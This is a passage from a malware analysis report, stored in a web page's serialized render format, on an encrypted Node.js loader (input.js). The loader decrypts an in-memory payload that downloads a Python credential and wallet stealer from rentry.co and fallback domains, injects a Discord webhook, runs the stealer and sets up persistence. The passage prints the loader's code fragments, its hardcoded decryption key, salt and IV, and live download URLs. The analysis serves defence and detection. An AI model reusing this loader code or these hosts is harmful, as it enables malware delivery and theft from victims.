The scripts were designed to:",[1255,6868,6869,6876,6881,6884],{},[1258,6870,6871,6872,6875],{},"Download an encrypted payload (",[63,6873,6874],{},"pyth.zip",") from fallback URLs",[1258,6877,6878,6879],{},"Extract the archive using ",[63,6880,6846],{},[1258,6882,6883],{},"Perform string replacement to inject specific credentials or wallet addresses",[1258,6885,6886,6887,6889,6890,4598,6893],{},"Launch the resulting Python file (",[63,6888,4622],{},") via ",[63,6891,6892],{},"child_process.exec()",[63,6894,4593],{},[12,6896,6897,6898,6904],{},"Crucially, the loader also included logic to ",[251,6899,6900,6901,6903],{},"copy ",[63,6902,4614],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[25,6906,6908,6909,6911],{"id":6907},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[63,6910,6813],{}," – The Encrypted JavaScript Payload Loader",[12,6913,31],{},[12,6915,6916,6918],{},[63,6917,6813],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[41,6920,6922],{"id":6921},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[12,6924,47],{},[12,6926,6927,6928,6930],{},"At first glance, ",[63,6929,6813],{}," contains very little readable code. 
However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[186,6932,6934],{"id":6933},"_611-decryption-logic","6.1.1 Decryption Logic",[12,6936,192],{},[12,6938,6939,6940,6943],{},"The script defines a ",[63,6941,6942],{},"decrypt()"," function that accepts four parameters:",[1255,6945,6946,6952,6958,6964],{},[1258,6947,6948,6951],{},[63,6949,6950],{},"encdata",": The encrypted Base64-encoded data",[1258,6953,6954,6957],{},[63,6955,6956],{},"masterkey",": A plaintext passphrase",[1258,6959,6960,6963],{},[63,6961,6962],{},"salt",": A cryptographic salt (Base64)",[1258,6965,6966,6969],{},[63,6967,6968],{},"iv",": The initialization vector for AES decryption (Base64)",[12,6971,6972,6973,6976],{},"The decryption process is implemented using Node.js’s built-in ",[63,6974,6975],{},"crypto"," module. It proceeds as follows:",[6086,6978,6979,7086,7198],{},[1258,6980,6981,6984,6985,7060],{},[251,6982,6983],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[56,6986,6990],{"className":6987,"code":6988,"language":6989,"meta":65,"style":65},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[63,6991,6992,7012,7017,7034,7042,7049,7056],{"__ignoreMap":65},[102,6993,6994,6997,7000,7003,7006,7009],{"class":104,"line":105},[102,6995,6996],{"class":285},"const",[102,6998,6999],{"class":275}," key",[102,7001,7002],{"class":285}," =",[102,7004,7005],{"class":293}," crypto.",[102,7007,7008],{"class":271},"pbkdf2Sync",[102,7010,7011],{"class":293},"(\n",[102,7013,7014],{"class":104,"line":111},[102,7015,7016],{"class":293},"  masterkey,\n",[102,7018,7019,7022,7025,7028,7031],{"class":104,"line":329},[102,7020,7021],{"class":293},"  Buffer.",[102,7023,7024],{"class":271},"from",[102,7026,7027],{"class":293},"(salt, 
",[102,7029,7030],{"class":289},"\"base64\"",[102,7032,7033],{"class":293},"),\n",[102,7035,7036,7039],{"class":104,"line":346},[102,7037,7038],{"class":275},"  100000",[102,7040,7041],{"class":293},",\n",[102,7043,7044,7047],{"class":104,"line":650},[102,7045,7046],{"class":275},"  32",[102,7048,7041],{"class":293},[102,7050,7051,7054],{"class":104,"line":656},[102,7052,7053],{"class":289},"  \"sha512\"",[102,7055,7041],{"class":293},[102,7057,7058],{"class":104,"line":662},[102,7059,825],{"class":293},[1255,7061,7062,7068,7074,7080],{},[1258,7063,7064,7067],{},[251,7065,7066],{},"Hash function:"," SHA-512",[1258,7069,7070,7073],{},[251,7071,7072],{},"Iterations:"," 100,000",[1258,7075,7076,7079],{},[251,7077,7078],{},"Key length:"," 32 bytes (256 bits)",[1258,7081,7082,7085],{},[251,7083,7084],{},"Salt:"," Supplied as a Base64-decoded input",[1258,7087,7088,7091,7092,7142,7144,7145],{},[251,7089,7090],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[56,7093,7095],{"className":6987,"code":7094,"language":6989,"meta":65,"style":65},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[63,7096,7097,7113,7120,7125,7138],{"__ignoreMap":65},[102,7098,7099,7101,7104,7106,7108,7111],{"class":104,"line":105},[102,7100,6996],{"class":285},[102,7102,7103],{"class":275}," decipher",[102,7105,7002],{"class":285},[102,7107,7005],{"class":293},[102,7109,7110],{"class":271},"createDecipheriv",[102,7112,7011],{"class":293},[102,7114,7115,7118],{"class":104,"line":111},[102,7116,7117],{"class":289},"  \"aes-256-cbc\"",[102,7119,7041],{"class":293},[102,7121,7122],{"class":104,"line":329},[102,7123,7124],{"class":293},"  key,\n",[102,7126,7127,7129,7131,7134,7136],{"class":104,"line":346},[102,7128,7021],{"class":293},[102,7130,7024],{"class":271},[102,7132,7133],{"class":293},"(iv, 
",[102,7135,7030],{"class":289},[102,7137,7033],{"class":293},[102,7139,7140],{"class":104,"line":650},[102,7141,825],{"class":293},[531,7143],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[56,7146,7148],{"className":6987,"code":7147,"language":6989,"meta":65,"style":65},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[63,7149,7150,7179],{"__ignoreMap":65},[102,7151,7152,7155,7158,7161,7164,7167,7170,7172,7174,7177],{"class":104,"line":105},[102,7153,7154],{"class":285},"let",[102,7156,7157],{"class":293}," decrypted ",[102,7159,7160],{"class":285},"=",[102,7162,7163],{"class":293}," decipher.",[102,7165,7166],{"class":271},"update",[102,7168,7169],{"class":293},"(encdata, ",[102,7171,7030],{"class":289},[102,7173,805],{"class":293},[102,7175,7176],{"class":289},"\"utf8\"",[102,7178,825],{"class":293},[102,7180,7181,7184,7187,7189,7192,7194,7196],{"class":104,"line":111},[102,7182,7183],{"class":293},"decrypted ",[102,7185,7186],{"class":285},"+=",[102,7188,7163],{"class":293},[102,7190,7191],{"class":271},"final",[102,7193,545],{"class":293},[102,7195,7176],{"class":289},[102,7197,825],{"class":293},[1258,7199,7200,7203,7204,7207,7208,7229,7231],{},[251,7201,7202],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. 
Instead, it is dynamically executed in memory using the ",[63,7205,7206],{},"Function"," constructor:",[56,7209,7211],{"className":6987,"code":7210,"language":6989,"meta":65,"style":65},"new Function(\"require\", decrypted)(require);\n",[63,7212,7213],{"__ignoreMap":65},[102,7214,7215,7218,7221,7223,7226],{"class":104,"line":105},[102,7216,7217],{"class":285},"new",[102,7219,7220],{"class":271}," Function",[102,7222,545],{"class":293},[102,7224,7225],{"class":289},"\"require\"",[102,7227,7228],{"class":293},", decrypted)(require);\n",[531,7230],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[12,7233,7234],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[12,7236,7237],{},[251,7238,7239],{},"Key Material and Encrypted Data",[12,7241,7242],{},"The script includes the following hardcoded inputs:",[1255,7244,7245,7251,7259,7267],{},[1258,7246,7247,7250],{},[251,7248,7249],{},"Encrypted Data:"," A massive Base64-encoded blob",[1258,7252,7253,540,7256],{},[251,7254,7255],{},"Master Key:",[63,7257,7258],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[1258,7260,7261,540,7263,7266],{},[251,7262,7084],{},[63,7264,7265],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[1258,7268,7269,540,7272,7266],{},[251,7270,7271],{},"IV:",[63,7273,7274],{},"HwK6sOz7FBbL+YsrOxtYUg==",[12,7276,7277,7278,1014],{},"These are all embedded directly in the source code of ",[63,7279,6813],{},[41,7281,7283],{"id":7282},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[12,7285,47],{},[12,7287,7288],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[186,7290,7292],{"id":7291},"_621-environment-preparation","6.2.1 Environment Preparation",[12,7294,192],{},[12,7296,7297],{},"The decrypted payload 
begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[1255,7299,7300,7333],{},[1258,7301,7302,7305,7306,7309,7310],{},[251,7303,7304],{},"Temporary Directory Resolution:","\nThe malware calls ",[63,7307,7308],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[56,7311,7313],{"className":6987,"code":7312,"language":6989,"meta":65,"style":65},"const tempDir = os.tmpdir();\n",[63,7314,7315],{"__ignoreMap":65},[102,7316,7317,7319,7322,7324,7327,7330],{"class":104,"line":105},[102,7318,6996],{"class":285},[102,7320,7321],{"class":275}," tempDir",[102,7323,7002],{"class":285},[102,7325,7326],{"class":293}," os.",[102,7328,7329],{"class":271},"tmpdir",[102,7331,7332],{"class":293},"();\n",[1258,7334,7335,7338,7339,7352],{},[251,7336,7337],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[1255,7340,7341,7346],{},[1258,7342,7343,7345],{},[63,7344,6874],{},": The archive that contains the actual second-stage Python-based stealer",[1258,7347,7348,7351],{},[63,7349,7350],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[56,7353,7355],{"className":6987,"code":7354,"language":6989,"meta":65,"style":65},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[63,7356,7357,7380],{"__ignoreMap":65},[102,7358,7359,7361,7364,7366,7369,7372,7375,7378],{"class":104,"line":105},[102,7360,6996],{"class":285},[102,7362,7363],{"class":275}," tempFile",[102,7365,7002],{"class":285},[102,7367,7368],{"class":293}," path.",[102,7370,7371],{"class":271},"join",[102,7373,7374],{"class":293},"(tempDir, 
",[102,7376,7377],{"class":289},"\"pyth.zip\"",[102,7379,825],{"class":293},[102,7381,7382,7384,7387,7389,7391,7393,7395,7398],{"class":104,"line":111},[102,7383,6996],{"class":285},[102,7385,7386],{"class":275}," binderFile",[102,7388,7002],{"class":285},[102,7390,7368],{"class":293},[102,7392,7371],{"class":271},[102,7394,7374],{"class":293},[102,7396,7397],{"class":289},"\"bnd.exe\"",[102,7399,825],{"class":293},[12,7401,7402],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[186,7404,7406],{"id":7405},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[12,7408,192],{},[12,7410,7411],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[1255,7413,7414,7445,7530,7564],{},[1258,7415,7416,7419,7420,7439,7441,7442,7444],{},[251,7417,7418],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:",[56,7421,7423],{"className":6987,"code":7422,"language":6989,"meta":65,"style":65},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[63,7424,7425],{"__ignoreMap":65},[102,7426,7427,7429,7432,7434,7437],{"class":104,"line":105},[102,7428,6996],{"class":285},[102,7430,7431],{"class":275}," url",[102,7433,7002],{"class":285},[102,7435,7436],{"class":289}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[102,7438,1365],{"class":293},[531,7440],{},"This returns a plain-text URL string pointing to the actual location of the ",[63,7443,6874],{}," archive. 
Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[1258,7446,7447,7450,7451,7483,7485,7486,7488,7489,7523,7525,7526,7529],{},[251,7448,7449],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[56,7452,7454],{"className":6987,"code":7453,"language":6989,"meta":65,"style":65},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[63,7455,7456],{"__ignoreMap":65},[102,7457,7458,7460,7463,7465,7468,7471,7474,7477,7480],{"class":104,"line":105},[102,7459,6996],{"class":285},[102,7461,7462],{"class":275}," fileResponse",[102,7464,7002],{"class":285},[102,7466,7467],{"class":285}," await",[102,7469,7470],{"class":293}," axios.",[102,7472,7473],{"class":271},"get",[102,7475,7476],{"class":293},"(fileUrl, { responseType: ",[102,7478,7479],{"class":289},"\"stream\"",[102,7481,7482],{"class":293}," });\n",[531,7484],{},"The file is written to disk as ",[63,7487,6874],{}," in the system's temp directory:",[56,7490,7492],{"className":6987,"code":7491,"language":6989,"meta":65,"style":65},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[63,7493,7494,7512],{"__ignoreMap":65},[102,7495,7496,7498,7501,7503,7506,7509],{"class":104,"line":105},[102,7497,6996],{"class":285},[102,7499,7500],{"class":275}," writer",[102,7502,7002],{"class":285},[102,7504,7505],{"class":293}," fs.",[102,7507,7508],{"class":271},"createWriteStream",[102,7510,7511],{"class":293},"(tempFile);\n",[102,7513,7514,7517,7520],{"class":104,"line":111},[102,7515,7516],{"class":293},"fileResponse.data.",[102,7518,7519],{"class":271},"pipe",[102,7521,7522],{"class":293},"(writer);\n",[531,7524],{},"This download is wrapped in a ",[63,7527,7528],{},"Promise"," to ensure synchronous completion before further logic is executed.",[1258,7531,7532,7535,7536,7561,7563],{},[251,7533,7534],{},"Fallback 
URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[56,7537,7539],{"className":6987,"code":7538,"language":6989,"meta":65,"style":65},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[63,7540,7541,7552],{"__ignoreMap":65},[102,7542,7543,7546,7548],{"class":104,"line":105},[102,7544,7545],{"class":271},"https",[102,7547,1551],{"class":293},[102,7549,7551],{"class":7550},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[102,7553,7554,7556,7558],{"class":104,"line":111},[102,7555,7545],{"class":271},[102,7557,1551],{"class":293},[102,7559,7560],{"class":7550},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[531,7562],{},"These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.",[1258,7565,7566,7569,7570,7573],{},[251,7567,7568],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. 
The use of a dynamic pointer (",[63,7571,7572],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[12,7575,7576],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[1255,7578,7579,7585],{},[1258,7580,7581,7582,7584],{},"Downloads ",[63,7583,6874],{}," from the resolved URL",[1258,7586,7587,7588],{},"If that fails, it attempts fallback mirrors:\n",[1255,7589,7590,7595],{},[1258,7591,7592],{},[63,7593,7594],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[1258,7596,7597],{},[63,7598,7599],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[186,7601,7603],{"id":7602},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[12,7605,192],{},[12,7607,7608,7609,7611,7612,7614],{},"Once the ",[63,7610,6874],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. 
This is accomplished using the ",[63,7613,6846],{}," Node.js library, which allows programmatic handling of ZIP files.",[1255,7616,7617,7665,7692],{},[1258,7618,7619,7622,7659,7661,7662,7664],{},[251,7620,7621],{},"ZIP Extraction:",[56,7623,7625],{"className":6987,"code":7624,"language":6989,"meta":65,"style":65},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[63,7626,7627,7644],{"__ignoreMap":65},[102,7628,7629,7631,7634,7636,7639,7642],{"class":104,"line":105},[102,7630,6996],{"class":285},[102,7632,7633],{"class":275}," zip",[102,7635,7002],{"class":285},[102,7637,7638],{"class":285}," new",[102,7640,7641],{"class":271}," AdmZip",[102,7643,7511],{"class":293},[102,7645,7646,7649,7652,7654,7657],{"class":104,"line":111},[102,7647,7648],{"class":293},"zip.",[102,7650,7651],{"class":271},"extractAllTo",[102,7653,7374],{"class":293},[102,7655,7656],{"class":275},"true",[102,7658,825],{"class":293},[531,7660],{},"This extracts all contents of the archive to the system's temporary directory. 
The ",[63,7663,7656],{}," flag ensures overwriting of any existing files.",[1258,7666,7667,7670,7671,7673,7674],{},[251,7668,7669],{},"Archive Contents:","\nThe archive ",[63,7672,6874],{}," includes a fully bundled Python project, including:",[1255,7675,7676,7679,7682],{},[1258,7677,7678],{},"A directory structure resembling a legitimate Python package",[1258,7680,7681],{},"Several Python modules and dependencies",[1258,7683,7684,7685,7687,7688,7691],{},"The key file ",[63,7686,4622],{}," located at ",[63,7689,7690],{},"Crypto/Util/astor.py",", which is the main stealer payload",[1258,7693,7694,7697,7698,7700,7701,7721],{},[251,7695,7696],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[63,7699,4622],{}," to inject attacker-controlled configuration data such as:",[1255,7702,7703,7706,7709,7715],{},[1258,7704,7705],{},"A Discord webhook URL",[1258,7707,7708],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[1258,7710,7711,7712,1289],{},"A user identifier (",[63,7713,7714],{},"%USERID%",[1258,7716,7717,7718,1289],{},"An error status flag (",[63,7719,7720],{},"%ERRORSTATUS%",[56,7722,7724],{"className":6987,"code":7723,"language":6989,"meta":65,"style":65},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? 
\"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[63,7725,7726,7786,7799,7822,7832,7837,7842,7847,7852],{"__ignoreMap":65},[102,7727,7728,7731,7734,7737,7739,7742,7745,7748,7751,7754,7757,7760,7762,7765,7768,7772,7774,7777,7780,7783],{"class":104,"line":105},[102,7729,7730],{"class":293},"fs.",[102,7732,7733],{"class":271},"readFile",[102,7735,7736],{"class":293},"(extractedDir ",[102,7738,1295],{"class":285},[102,7740,7741],{"class":289}," \"",[102,7743,7744],{"class":275},"\\C",[102,7746,7747],{"class":289},"rypto",[102,7749,7750],{"class":275},"\\U",[102,7752,7753],{"class":289},"til",[102,7755,7756],{"class":275},"\\a",[102,7758,7759],{"class":289},"stor.py\"",[102,7761,805],{"class":293},[102,7763,7764],{"class":289},"'utf8'",[102,7766,7767],{"class":293},", (",[102,7769,7771],{"class":7770},"s4XuR","err",[102,7773,805],{"class":293},[102,7775,7776],{"class":7770},"data",[102,7778,7779],{"class":293},") ",[102,7781,7782],{"class":285},"=>",[102,7784,7785],{"class":293}," {\n",[102,7787,7788,7791,7794,7796],{"class":104,"line":111},[102,7789,7790],{"class":285},"  let",[102,7792,7793],{"class":293}," updatedFile ",[102,7795,7160],{"class":285},[102,7797,7798],{"class":293}," data\n",[102,7800,7801,7804,7807,7809,7812,7815,7819],{"class":104,"line":329},[102,7802,7803],{"class":293},"    .",[102,7805,7806],{"class":271},"replace",[102,7808,545],{"class":293},[102,7810,7811],{"class":289},"\"%DISCORD%\"",[102,7813,7814],{"class":293},", \u003C",[102,7816,7818],{"class":7817},"s9eBZ","webhook",[102,7820,7821],{"class":293},">)\n",[102,7823,7824,7827,7830],{"class":104,"line":346},[102,7825,7826],{"class":293},"    .replace(\"%ADDRESSBTC%\", \u003C",[102,7828,7829],{"class":275},"btc_address",[102,7831,7821],{"class":293},[102,7833,7834],{"class":104,"line":650},[102,7835,7836],{"class":293},"    ...\n",[102,7838,7839],{"class":104,"line":656},[102,7840,7841],{"class":293},"    
.replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[102,7843,7844],{"class":104,"line":662},[102,7845,7846],{"emptyLinePlaceholder":2180},"\n",[102,7848,7849],{"class":104,"line":668},[102,7850,7851],{"class":293},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[102,7853,7854],{"class":104,"line":674},[102,7855,7856],{"class":293},"});\n",[12,7858,7859],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[1255,7861,7862],{},[1258,7863,7864,7865,7867,7868],{},"Replaces placeholder strings in ",[63,7866,4622],{},":\n",[1255,7869,7870,7876,7886],{},[1258,7871,7872,7873],{},"Discord webhook: ",[63,7874,7875],{},"%DISCORD%",[1258,7877,7878,7879,805,7882,7885],{},"Wallet addresses: ",[63,7880,7881],{},"%ADDRESSBTC%",[63,7883,7884],{},"%ADDRESSETH%",", etc.",[1258,7887,7888],{},"User ID and error flags",[186,7890,7892],{"id":7891},"_624-malware-execution","6.2.4 Malware Execution",[12,7894,192],{},[1255,7896,7897],{},[1258,7898,7899,7900],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[56,7901,7903],{"className":6987,"code":7902,"language":6989,"meta":65,"style":65},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[63,7904,7905],{"__ignoreMap":65},[102,7906,7907,7910,7912,7915,7918,7921,7923,7926],{"class":104,"line":105},[102,7908,7909],{"class":271},"exec",[102,7911,545],{"class":293},[102,7913,7914],{"class":289},"\"python.exe Crypto",[102,7916,7917],{"class":275},"\\\\",[102,7919,7920],{"class":289},"Util",[102,7922,7917],{"class":275},[102,7924,7925],{"class":289},"astor.py\"",[102,7927,825],{"class":293},[12,7929,7930],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python 
payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[12,7932,7933],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[1255,7935,7936,7944,7951,7958],{},[1258,7937,7938,7940,7941],{},[63,7939,4618],{}," (Electron-based container) invokes ",[63,7942,7943],{},"node.exe",[1258,7945,7946,7948,7949],{},[63,7947,7943],{}," launches ",[63,7950,5123],{},[1258,7952,7953,7955,7956],{},[63,7954,5123],{}," starts ",[63,7957,4593],{},[1258,7959,7960,7962,7963],{},[63,7961,4593],{}," executes the file ",[63,7964,5133],{},[186,7966,7968],{"id":7967},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[12,7970,192],{},[12,7972,7973,7974,7976],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[63,7975,4614],{},") to a hidden location within the user’s profile.",[12,7978,7979],{},[251,7980,7981],{},"Target Directory",[12,7983,7984],{},"The file is copied to a directory that mimics legitimate Windows components:",[56,7986,7988],{"className":6987,"code":7987,"language":6989,"meta":65,"style":65},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[63,7989,7990],{"__ignoreMap":65},[102,7991,7992,7994,7997,7999],{"class":104,"line":105},[102,7993,1278],{"class":285},[102,7995,7996],{"class":275},"APPDATA",[102,7998,1278],{"class":285},[102,8000,8001],{"class":293},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[12,8003,8004],{},"This location is intentionally chosen:",[1255,8006,8007,8010],{},[1258,8008,8009],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[1258,8011,8012],{},"The directory name 
mimics legitimate Microsoft application folders, making it less suspicious.",[12,8014,8015],{},[251,8016,8017],{},"Copy Mechanism:",[12,8019,8020],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[56,8022,8024],{"className":6987,"code":8023,"language":6989,"meta":65,"style":65},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[63,8025,8026,8035,8045,8054,8063,8070,8077,8084,8091,8096],{"__ignoreMap":65},[102,8027,8028,8030,8033],{"class":104,"line":105},[102,8029,7730],{"class":293},[102,8031,8032],{"class":271},"copyFileSync",[102,8034,7011],{"class":293},[102,8036,8037,8040,8043],{"class":104,"line":111},[102,8038,8039],{"class":293},"  process.env.",[102,8041,8042],{"class":275},"PORTABLE_EXECUTABLE_FILE",[102,8044,7041],{"class":293},[102,8046,8047,8050,8052],{"class":104,"line":329},[102,8048,8049],{"class":293},"  path.",[102,8051,7371],{"class":271},[102,8053,7011],{"class":293},[102,8055,8056,8059,8061],{"class":104,"line":346},[102,8057,8058],{"class":293},"    process.env.",[102,8060,7996],{"class":275},[102,8062,7041],{"class":293},[102,8064,8065,8068],{"class":104,"line":650},[102,8066,8067],{"class":289},"    \"Microsoft\"",[102,8069,7041],{"class":293},[102,8071,8072,8075],{"class":104,"line":656},[102,8073,8074],{"class":289},"    \"Internet Explorer\"",[102,8076,7041],{"class":293},[102,8078,8079,8082],{"class":104,"line":662},[102,8080,8081],{"class":289},"    \"UserData\"",[102,8083,7041],{"class":293},[102,8085,8086,8089],{"class":104,"line":668},[102,8087,8088],{"class":289},"    \"Updater.exe\"",[102,8090,7041],{"class":293},[102,8092,8093],{"class":104,"line":674},[102,8094,8095],{"class":293},"  ),\n",[102,8097,8098],{"class":104,"line":680},[102,8099,825],{"class":293},[1255,8101,8102,8105],{},[1258,8103,8104],{},"PORTABLE_EXECUTABLE_FILE is an environment variable 
automatically set by many packers (such as Electron) to reference the path of the executing binary.",[1258,8106,8107],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[12,8109,8110],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[12,8112,8113,8116],{},[251,8114,8115],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[1255,8118,8119,8122],{},[1258,8120,8121],{},"The loader can re-trigger itself across system reboots.",[1258,8123,8124],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.",[186,8126,8128],{"id":8127},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[12,8130,192],{},[12,8132,8133,8134,8136],{},"In addition to downloading and executing the main stealer payload (",[63,8135,4622],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for persistence, distraction, or deployment of additional malware modules.",[12,8138,8139],{},[251,8140,8141],{},"Conditional Execution",[12,8143,8144],{},"The binder logic is only activated if a specific flag is set:",[56,8146,8148],{"className":6987,"code":8147,"language":6989,"meta":65,"style":65},"enableBinder = true;\n",[63,8149,8150],{"__ignoreMap":65},[102,8151,8152,8155,8157,8160],{"class":104,"line":105},[102,8153,8154],{"class":293},"enableBinder ",[102,8156,7160],{"class":285},[102,8158,8159],{"class":275}," true",[102,8161,1365],{"class":293},[12,8163,8164,8165,8168],{},"In the sample analyzed, this value was set to ",[63,8166,8167],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or 
variant.",[12,8170,8171],{},[251,8172,8173],{},"Binder Download Logic",[12,8175,8176,8177,8180],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[63,8178,8179],{},"%BINDERURL%"," placeholder:",[56,8182,8184],{"className":6987,"code":8183,"language":6989,"meta":65,"style":65},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[63,8185,8186,8200,8220,8235],{"__ignoreMap":65},[102,8187,8188,8190,8193,8195,8198],{"class":104,"line":105},[102,8189,6996],{"class":285},[102,8191,8192],{"class":275}," fileUrl",[102,8194,7002],{"class":285},[102,8196,8197],{"class":289}," \"%BINDERURL%\"",[102,8199,1365],{"class":293},[102,8201,8202,8204,8206,8208,8210,8212,8214,8216,8218],{"class":104,"line":111},[102,8203,6996],{"class":285},[102,8205,7462],{"class":275},[102,8207,7002],{"class":285},[102,8209,7467],{"class":285},[102,8211,7470],{"class":293},[102,8213,7473],{"class":271},[102,8215,7476],{"class":293},[102,8217,7479],{"class":289},[102,8219,7482],{"class":293},[102,8221,8222,8224,8226,8228,8230,8232],{"class":104,"line":329},[102,8223,6996],{"class":285},[102,8225,7500],{"class":275},[102,8227,7002],{"class":285},[102,8229,7505],{"class":293},[102,8231,7508],{"class":271},[102,8233,8234],{"class":293},"(binderFile);\n",[102,8236,8237,8239,8241],{"class":104,"line":346},[102,8238,7516],{"class":293},[102,8240,7519],{"class":271},[102,8242,7522],{"class":293},[1255,8244,8245,8250],{},[1258,8246,6600,8247,8249],{},[63,8248,7350],{}," file is saved into the system's temporary directory.",[1258,8251,8252,8253,8255],{},"Like ",[63,8254,6874],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[12,8257,8258],{},[251,8259,8260],{},"Execution 